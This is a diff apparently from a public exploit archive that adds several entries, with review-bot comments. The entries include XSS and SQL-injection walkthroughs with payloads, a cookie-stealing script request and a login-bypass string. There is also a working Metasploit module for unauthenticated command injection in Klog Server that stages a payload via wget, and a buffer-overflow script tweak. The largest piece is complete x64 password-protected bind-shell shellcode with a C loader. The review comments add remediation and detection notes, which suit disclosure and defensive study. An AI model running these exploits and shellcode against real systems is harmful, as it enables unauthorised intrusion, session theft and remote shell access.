diff --git a/exploits/php/webapps/49467.txt b/exploits/php/webapps/49467.txt
new file mode 100644
index 000000000..894749740
--- /dev/null
+++ b/exploits/php/webapps/49467.txt
@@ -0,0 +1,29 @@
+# Exploit Title: MyBB Timeline Plugin 1.0 - Cross-Site Scripting / CSRF
+# Date: 1/21/2021
+# Author: 0xB9
+# Software Link: https://community.mybb.com/mods.php?action=view&pid=1428
+# Version: 1.0
+# Tested on: Windows 10
+
+1. Description:
+MyBB Timeline replaces the default MyBB user profile. This introduces cross-site scripting on user profiles & a CSRF that allows for the users timeline banner/image to be changed.
+
+
+2. Proof of Concept:
+
+~ XSS via Thread/Post ~
+- Make a new thread or reply to an existing thread
+- Input a payload in either the thread title or main post itself
+Payload will execute when visiting your profile.
+
+~ XSS via Location/Bio ~
+- Go to User CP -> Edit Profile
+- Input a payload in the Location/Bio
+Payload will execute when visiting your profile.
+
+~ CSRF ~
+
\ No newline at end of file
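Review bot: The `~ CSRF ~` section at the end of the file has a heading and no body, so the entry claims a CSRF that changes the timeline banner without naming the affected action or parameter; the content may have been lost when markup was stripped. Without it a maintainer cannot tell which request needs a post-key check. The two XSS sections also stop at "Payload will execute" and never say which profile output is rendered unescaped. I would close the file with a remediation line such as `Fix: escape thread titles, post text, location and bio with htmlspecialchars_uni() on the profile page, and call verify_post_check() on the banner-change request`, marked as unverified because the plugin source is not shown here.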
diff --git a/exploits/php/webapps/49468.txt b/exploits/php/webapps/49468.txt
new file mode 100644
index 000000000..f66b049f4
--- /dev/null
+++ b/exploits/php/webapps/49468.txt
@@ -0,0 +1,113 @@
+# Exploit Title: Collabtive 3.1 - 'address' Persistent Cross-Site Scripting
+# Date: 2021-01-23
+# Exploit Author: Deha Berkin Bir
+# Vendor Homepage: https://collabtive.o-dyn.de/
+# Version: 3.1
+# Tested on: Windows & XAMPP
+
+==> Tutorial <==
+
+1- Login to your account.
+2- Go to the profile edit page and write your XSS/HTML payload into "Address" section.
+- You will see the executed HTML payload at there. (HTML Injection)
+- You will see the executed XSS payload at profile edit section. (XSS)
+
+==> Executed Payloads <==
+
+XSS Payload ==> " onfocus="alert(1)" autofocus="
+HTML Payload ==> DehaBerkinBir
+
+==> HTTP Request <==
+
+POST /manageuser.php?action=edit HTTP/1.1
+Host: (HOST)
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://(HOST)/manageuser.php?action=editform&id=1
+Content-Type: multipart/form-data; boundary=---------------------------12097618915709137911841560297
+Content-Length: 2327
+Connection: close
+Cookie: activeSlideIndex=0; PHPSESSID=oj123o7asdfasdfu4pts2g
+Upgrade-Insecure-Requests: 1
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="name"
+
+admin
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="userfile"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="file-avatar"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="company"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="email"
+
+dehaberkinbir@hotmail.com
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="web"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="tel1"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="tel2"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="address1"
+
+" onfocus="alert(1)" autofocus="
+-----------------------------12097618915709137911841560297
+
+Content-Disposition: form-data; name="zip"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="address2"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="country"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="state"
+
+admin
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="gender"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="locale"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="admin"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="oldpass"
+
+admin
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="newpass"
+
+
+-----------------------------12097618915709137911841560297
+Content-Disposition: form-data; name="repeatpass"
+
+
+-----------------------------12097618915709137911841560297--
\ No newline at end of file
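Review bot: The captured request under `==> HTTP Request <==` still carries a `PHPSESSID` value, an e-mail address and the `oldpass` field value, while only the host was replaced with `(HOST)`; these should be placeholders too, e.g. `Cookie: PHPSESSID=(SESSION)`. The payload works by closing a quoted attribute, which suggests the `address1` value is written back into the edit form's `value="..."` without quote encoding (inferred, the PHP is not shown). A remediation line would make the entry actionable for the vendor: `Fix: output profile fields with htmlspecialchars($v, ENT_QUOTES, 'UTF-8')`.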
diff --git a/exploits/php/webapps/49469.txt b/exploits/php/webapps/49469.txt
new file mode 100644
index 000000000..11445358f
--- /dev/null
+++ b/exploits/php/webapps/49469.txt
@@ -0,0 +1,17 @@
+# Exploit Title: CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS
+# Exploit Author: Anita Gaud
+# Vendor Homepage: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=12210&title=CASAP+Automated+Enrollment+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1
+# Tested on Windows
+
+*XSS IMPACT:*
+1: Steal the cookie
+2: User redirection to a malicious website
+
+Vulnerable Parameters: First Name
+
+*Steps to reproduce:*
+1: Log in with a valid username and password. Navigate to the Users tab (http://localhost/Final/Final/users.php) on the left-hand side.
+2: Add the new user and then add the payload in First Name parameter and click on save button. Post Saved successfully.
+3: Now, XSS will get stored and trigger every time and the attacker can steal authenticated users' cookies.
\ No newline at end of file
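Review bot: The header has no `# Date:` line, and the body does not name the page that renders First Name, so the entry cannot be triaged or retested from the text alone. Since the stated impact is cookie theft, the entry should record the two mitigations that address it: HTML-encode the first name wherever the Users list prints it, and mark the session cookie HttpOnly (`session.cookie_httponly = 1`). The same applies to the `route` field in 49470.txt, whose request body reads `document.cookie`.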
diff --git a/exploits/php/webapps/49470.txt b/exploits/php/webapps/49470.txt
new file mode 100644
index 000000000..0e6355319
--- /dev/null
+++ b/exploits/php/webapps/49470.txt
@@ -0,0 +1,29 @@
+# Exploit Title: CASAP Automated Enrollment System 1.0 - 'route' Stored XSS
+# Exploit Author: Richard Jones
+# Date: 2021-01/23
+# Vendor Homepage: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=12210&title=CASAP+Automated+Enrollment+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
+
+# Steps to reproduce
+# 1. login bypass username: admin, password: `' or 1=1#
+# 2. Studants > Edit > "ROUTE" field enter.. "
+# Save, reload page, exploited stored XXS
+
+
+POST /Final/update_student.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
+Accept: */*
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 297
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/Final/edit_stud.php?id=6
+Cookie: PHPSESSID=97qoeda9h6djjis5gbr00p7ndc
+
+student_id=6&status=half&fname=Ronel&mname=G.&lname=Ortega&gender=Male&dob=1999-06-16&address=Prk.1+brgy.banago+bacolod+city&student_class=ICT+-+Computer+Programming&transport=yes&route=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&gfname=Juanita&gmname=S.&glname=a&rship=Mother&tel=0912312445
\ No newline at end of file
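Review bot: Step 1 depends on a separate flaw, a SQL-injection login bypass, which this entry neither titles nor references. It looks like the issue listed as 49463 in files_exploits.csv and should be cross-referenced with a header line such as `# Requires: authentication bypass (see 49463)`. As written, a reader who fixes only the output encoding of `route` would leave the login query injectable; that query needs a prepared statement. The header date `2021-01/23` is malformed next to the `YYYY-MM-DD` form used by the neighbouring entries, and the value to enter in step 2 appears to have been stripped after `enter..`.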
diff --git a/exploits/php/webapps/49471.txt b/exploits/php/webapps/49471.txt
new file mode 100644
index 000000000..bd2a821bd
--- /dev/null
+++ b/exploits/php/webapps/49471.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Library System 1.0 - 'category' SQL Injection
+# Exploit Author: Aitor Herrero
+# Date: 2021-01-22
+# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html
+# Software Link: https://www.sourcecodester.com/php/12275/library-system-using-php.html
+# Version: 1.0
+# Tested On: Windows 10 + XAMPP 7.4.4
+# Description: Library System 1.0
+
+#STEP 1 : Go to the principal main
+#STEP 2 : Choose a category example :http://localhost:8080/libsystem/libsystem/index.php?category=3
+#STEP 3: Run your sqlmap example:
+sqlmap -u "http://localhost:8080/libsystem/libsystem/index.php?category=3" --dbs
\ No newline at end of file
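Review bot: The entry gives a URL and a scanner command but not the finding itself. It does not say which query consumes `category`, what injection type was confirmed or what data was reachable, and the `# Description:` line only repeats the product name. The parameter is a numeric id in the example URL, so the remediation is short enough to state in the file: `Fix: cast category with (int) or bind it in a prepared statement (mysqli_stmt::bind_param)`. "Go to the principal main" in step 1 presumably means the application's main page and should say so.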
diff --git a/exploits/php/webapps/49474.rb b/exploits/php/webapps/49474.rb
new file mode 100755
index 000000000..4636d4c5d
--- /dev/null
+++ b/exploits/php/webapps/49474.rb
@@ -0,0 +1,104 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Klog Server Unauthenticated Command Injection Vulnerability',
+ 'Description' => %q{
+ This module exploits an unauthenticated command injection vulnerability in Klog Server <= 2.4.1.
+ "user" parameter is executed via shell_exec() function without input validation.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [ 'B3KC4T', # Vulnerability discovery
+ 'Metin Yunus Kandemir', # Metasploit module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2020-35729'],
+ ['URL', 'https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection']
+ ],
+
+ 'DefaultOptions' =>
+ {
+ 'HttpClientTimeout' => 2,
+ },
+ 'Platform' => [ 'unix', 'linux' ],
+ 'Arch' => [ ARCH_X64 ],
+ 'Targets' => [
+ ['Klog Server 2.4.1 (x64)', {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X64,
+ }],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "2021-01-05",
+ 'DefaultTarget' => 0))
+ register_options(
+ [
+ Opt::RPORT(443),
+ OptBool.new('SSL', [true, 'Use SSL', true]),
+ OptString.new('TARGETURI', [true, 'The base path of the Klog Server', '/']),
+ ]
+ )
+ end
+
+ def filter_bad_chars(cmd)
+ cmd.gsub!(/chmod \+x/, 'chmod 777')
+ cmd.gsub!(/;/, " %0A ")
+ cmd.gsub!(/ /, '+')
+ cmd.gsub!(/\//, '%2F')
+
+ end
+
+ def execute_command(cmd, opts = {})
+ command_payload = "unsafe+%22%26+#{filter_bad_chars(cmd)}%26%22"
+
+ print_status("Sending stager payload...")
+ uri = target_uri.path
+ res= send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(uri, 'actions', 'authenticate.php'),
+ 'encode_params' => false,
+ 'vars_post' => {
+ 'user' => command_payload,
+ 'pswd' => "inline"
+ }
+ })
+ if res && res.code == 302
+ print_error("The target is not vulnerable!")
+ else
+ print_good("The target is vulnerable!")
+ end
+ end
+
+ def check
+ uri = target_uri.path
+ res= send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(uri, 'actions', 'authenticate.php'),
+ 'encode_params' => false,
+ 'vars_post' => {
+ 'user' => "unsafe+%22%26sleep+40%26%22", #checking blind command injection via sleep
+ 'pswd' => "inline"
+ }
+ })
+ if res && res.code == 302
+ return Exploit::CheckCode::Safe
+ else
+ return Exploit::CheckCode::Vulnerable
+ end
+ end
+
+ def exploit
+ print_status("Exploiting...")
+ execute_cmdstager(flavor: :wget, delay: 10)
+ end
+end
\ No newline at end of file
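Review bot: `check` returns `Exploit::CheckCode::Vulnerable` for every outcome except a 302, which includes `res == nil` from an unreachable host, a failed TLS handshake or any error page, so an assessment run with this module will report false positives. With `HttpClientTimeout` set to 2 and a `sleep 40` probe, the positive signal is itself a timeout and cannot be told apart from a dead service. I would send an ordinary login request first and `return Exploit::CheckCode::Unknown` when that gets no response, and report `Exploit::CheckCode::Appears` rather than `Vulnerable` for a timing-only result. `execute_command` has the same inverted test and prints "The target is vulnerable!" on a nil response. The description should also name the fix the vendor needs, which is to validate `user` and pass it through `escapeshellarg()` before it reaches `shell_exec()`.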
diff --git a/exploits/windows/remote/47554.py b/exploits/windows/remote/47554.py
index c71a7de2f..7e6d0e712 100755
--- a/exploits/windows/remote/47554.py
+++ b/exploits/windows/remote/47554.py
@@ -48,11 +48,12 @@ buf += "\x32\xb4\xfe\x5c"
jmpesp = '\x23\x49\xA1\x0F'
+# buffer length depends on length of source ip address, 5095 works for xxx.xxx.xx.x, you may need to tweak the length up or down
#buffer = '\x41' * 5093 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
-#buffer = '\x41' * 5093 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
+#buffer = '\x41' * 5094 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
buffer = '\x41' * 5095 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
+#buffer = '\x41' * 5096 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5097 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
-#buffer = '\x41' * 5099 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
diff --git a/files_exploits.csv b/files_exploits.csv
index 3aadaee24..a0734ca12 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -43663,3 +43663,9 @@ id,file,description,date,author,type,platform,port
49463,exploits/php/webapps/49463.py,"CASAP Automated Enrollment System 1.0 - Authentication Bypass",2021-01-22,"Himanshu Shukla",webapps,php,
49464,exploits/multiple/webapps/49464.py,"ERPNext 12.14.0 - SQL Injection (Authenticated)",2021-01-22,Hodorsec,webapps,multiple,
49465,exploits/multiple/webapps/49465.py,"Atlassian Confluence Widget Connector Macro - SSTI",2021-01-22,46o60,webapps,multiple,
+49467,exploits/php/webapps/49467.txt,"MyBB Timeline Plugin 1.0 - Cross-Site Scripting / CSRF",2021-01-25,0xB9,webapps,php,
+49468,exploits/php/webapps/49468.txt,"Collabtive 3.1 - 'address' Persistent Cross-Site Scripting",2021-01-25,"Deha Berkin Bir",webapps,php,
+49469,exploits/php/webapps/49469.txt,"CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS",2021-01-25,"Anita Gaud",webapps,php,
+49470,exploits/php/webapps/49470.txt,"CASAP Automated Enrollment System 1.0 - 'route' Stored XSS",2021-01-25,"Richard Jones",webapps,php,
+49471,exploits/php/webapps/49471.txt,"Library System 1.0 - 'category' SQL Injection",2021-01-25,"Aitor Herrero",webapps,php,
+49474,exploits/php/webapps/49474.rb,"Klog Server 2.4.1 - Unauthenticated Command Injection (Metasploit)",2021-01-25,"Metin Yunus Kandemir",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 3ca8863af..4490a70c4 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1029,3 +1029,4 @@ id,file,description,date,author,type,platform
48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",2020-07-26,"Siddharth Sharma",shellcode,windows_x86
49416,shellcodes/linux/49416.txt,"Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2021-01-12,ac3,shellcode,linux
49466,shellcodes/windows_x86/49466.asm,"Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)",2021-01-22,"Armando Huesca Prida",shellcode,windows_x86
+49472,shellcodes/linux/49472.c,"Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)",2021-01-25,"Guillem Alminyana",shellcode,linux
diff --git a/shellcodes/linux/49472.c b/shellcodes/linux/49472.c
new file mode 100644
index 000000000..757d1f662
--- /dev/null
+++ b/shellcodes/linux/49472.c
@@ -0,0 +1,107 @@
+/*
+ Exploit Title: Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)
+ Author: Guillem Alminyana
+ Date: 2021-01-18
+ Platform: GNU Linux x64
+ =====================================
+ Compile:
+ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+*/
+
+#include
+#include
+
+unsigned char code[]= \
+"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x50\x5f\x52\x52\x66\x68"
+"\x11\x5c\x66\x6a\x02\x6a\x31\x58\x54\x5e\xb2\x10\x0f\x05\x6a\x32\x58\x6a\x02\x5e"
+"\x0f\x05\x6a\x2b\x58\x48\x31\xf6\x99\x0f\x05\x50\x5f\x6a\x02\x5e\x6a\x21\x58\x0f"
+"\x05\x48\xff\xce\x79\xf6\x6a\x01\x58\x49\xb9\x50\x61\x73\x73\x77\x64\x3a\x20\x41"
+"\x51\x48\x89\xe6\x6a\x08\x5a\x0f\x05\x48\x31\xc0\x48\x83\xc6\x08\x0f\x05\x48\xb8"
+"\x31\x32\x33\x34\x35\x36\x37\x38\x56\x5f\x48\xaf\x75\x1c\x48\x31\xc0\x50\x48\xbb"
+"\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x50\x54\x5a\x57\x54\x5e\x6a\x3b\x58"
+"\x0f\x05";
+
+void main()
+{
+ printf("ShellCode Lenght: %d\n", strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
+
+/*
+ ASM
+ 0: 6a 29 push 0x29
+ 2: 58 pop rax
+ 3: 6a 02 push 0x2
+ 5: 5f pop rdi
+ 6: 6a 01 push 0x1
+ 8: 5e pop rsi
+ 9: 48 31 d2 xor rdx,rdx
+ c: 0f 05 syscall
+ e: 50 push rax
+ f: 5f pop rdi
+ 10: 52 push rdx
+ 11: 52 push rdx
+ 12: 66 68 11 5c pushw 0x5c11
+ 16: 66 6a 02 pushw 0x2
+ 19: 6a 31 push 0x31
+ 1b: 58 pop rax
+ 1c: 54 push rsp
+ 1d: 5e pop rsi
+ 1e: b2 10 mov dl,0x10
+ 20: 0f 05 syscall
+ 22: 6a 32 push 0x32
+ 24: 58 pop rax
+ 25: 6a 02 push 0x2
+ 27: 5e pop rsi
+ 28: 0f 05 syscall
+ 2a: 6a 2b push 0x2b
+ 2c: 58 pop rax
+ 2d: 48 31 f6 xor rsi,rsi
+ 30: 99 cdq
+ 31: 0f 05 syscall
+ 33: 50 push rax
+ 34: 5f pop rdi
+ 35: 6a 02 push 0x2
+ 37: 5e pop rsi
+ 38: 6a 21 push 0x21
+ 3a: 58 pop rax
+ 3b: 0f 05 syscall
+ 3d: 48 ff ce dec rsi
+ 40: 79 f6 jns 38
+ 42: 6a 01 push 0x1
+ 44: 58 pop rax
+ 45: 49 b9 50 61 73 73 77 movabs r9,0x203a647773736150
+ 4c: 64 3a 20
+ 4f: 41 51 push r9
+ 51: 48 89 e6 mov rsi,rsp
+ 54: 6a 08 push 0x8
+ 56: 5a pop rdx
+ 57: 0f 05 syscall
+ 59: 48 31 c0 xor rax,rax
+ 5c: 48 83 c6 08 add rsi,0x8
+ 60: 0f 05 syscall
+ 62: 48 b8 31 32 33 34 35 movabs rax,0x3837363534333231
+ 69: 36 37 38
+ 6c: 56 push rsi
+ 6d: 5f pop rdi
+ 6e: 48 af scas rax,QWORD PTR es:[rdi]
+ 70: 75 1c jne 8e
+ 72: 48 31 c0 xor rax,rax
+ 75: 50 push rax
+ 76: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
+ 7d: 2f 73 68
+ 80: 53 push rbx
+ 81: 54 push rsp
+ 82: 5f pop rdi
+ 83: 50 push rax
+ 84: 54 push rsp
+ 85: 5a pop rdx
+ 86: 57 push rdi
+ 87: 54 push rsp
+ 88: 5e pop rsi
+ 89: 6a 3b push 0x3b
+ 8b: 58 pop rax
+ 8c: 0f 05 syscall
+
+*/
\ No newline at end of file
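Review bot: In `main`, `printf("ShellCode Lenght: %d\n", strlen(code))` passes a `size_t` to `%d`, which is undefined behaviour on x86-64, and `strlen` is handed an `unsigned char *`. The two `#include` lines show no header name in this view, which leaves `printf` and `strlen` undeclared (possibly an extraction loss). I would write `printf("ShellCode Length: %zu\n", sizeof code - 1);` and declare `int main(void)`. The disassembly comment would serve an analyst better with one annotation per `syscall` (0x29 socket, 0x31 bind, 0x32 listen, 0x2b accept, 0x21 dup2, 0x3b execve). It should also note that `0x5c11` is port 4444 and that the first two `movabs` constants are the ASCII prompt `Passwd: ` and the cleartext password, since a listener on that port and those byte strings are what a detection rule would match.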